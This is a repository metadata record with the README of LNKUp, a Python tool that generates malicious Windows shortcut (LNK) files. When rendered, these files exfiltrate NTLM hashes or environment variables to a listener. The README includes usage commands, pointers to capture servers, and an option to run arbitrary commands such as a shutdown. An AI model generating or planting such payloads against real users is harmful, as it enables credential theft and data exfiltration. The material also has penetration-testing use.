{"id":19339569,"url":"https://github.com/plazmaz/lnkup","last_synced_at":"2025-04-08T03:12:28.327Z","repository":{"id":72390643,"uuid":"99828924","full_name":"Plazmaz/LNKUp","owner":"Plazmaz","description":"Generates malicious LNK file payloads for data exfiltration","archived":false,"fork":false,"pushed_at":"2017-08-21T22:58:13.000Z","size":10,"stargazers_count":377,"open_issues_count":0,"forks_count":54,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-03-31T18:20:37.550Z","etag":null,"topics":["data-exfiltration","lnk","lnk-payloads","microsoft","ntlm","payload","penetration-testing","pentesting","security","usb","windows"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Plazmaz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-08-09T16:18:07.000Z","updated_at":"2025-03-24T06:45:25.000Z","dependencies_parsed_at":null,"dependency_job_id":"c1266ffb-9202-4f36-92e4-d1318670b7c2","html_url":"https://github.com/Plazmaz/LNKUp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Plazmaz%2FLNKUp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Plazmaz%2FLNKUp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Plazmaz%2FLNKUp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Plazmaz%2FLNKUp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Plazmaz","download_url":"https://codeload.github.com/Plazmaz/LNKUp/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247767236,"owners_count":20992548,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["data-exfiltration","lnk","lnk-payloads","microsoft","ntlm","payload","penetration-testing","pentesting","security","usb","windows"],"created_at":"2024-11-10T03:22:59.053Z","updated_at":"2025-04-08T03:12:28.305Z","avatar_url":"https://github.com/Plazmaz.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# LNKUp\nLNK Data exfiltration payload generator\n---\nThis tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.   \n\n## Info\n**I am not responsible for any actions you take with this tool!**   \nYou can contact me with any questions by opening an issue, or via my Twitter, [@Plazmaz](https://www.twitter.com/Plazmaz).\n\n## Known gotchas\n* This tool will not work on OSX or Linux machines. It is specifically designed to target windows.\n* There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.\n* You will need to run a responder or [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb) server to capture NTLM hashes.\n* To capture environment variables, you'll need to run a webserver like apache, nginx, or even just [this](https://gist.github.com/Plazmaz/cafd0bd3a3a4471446cc8fe6e4f0c036)\n\n## Installation\nInstall requirements using   \n`pip install -r requirements.txt`\n\n\n## Usage\n\n#### Payload types:\n* NTLM\n\t* Steals the user's NTLM hash when rendered.\n\t* Needs listener server such as this [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb)\n\t* More on NTLM hashes leaking: [https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/](https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/?utm_source=github_lnkup)\n\t* Example usage:   \n\t `lnkup.py --host localhost --type ntlm --output out.lnk`\n* Environment\n\t* Steals the user's environment variables.\n\t* Examples: %PATH%, %USERNAME%, etc\n\t* Requires variables to be set using --vars\n\t* Example usage:   \n\t `lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk`\n#### Extra:\n* Use `--execute` to specify a command to run when the shortcut is double clicked\n\t* Example:   \n\t  `lnkup.py --host localhost --type ntlm --output out.lnk --execute \"shutdown /s\"`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fplazmaz%2Flnkup","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fplazmaz%2Flnkup","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fplazmaz%2Flnkup/lists"}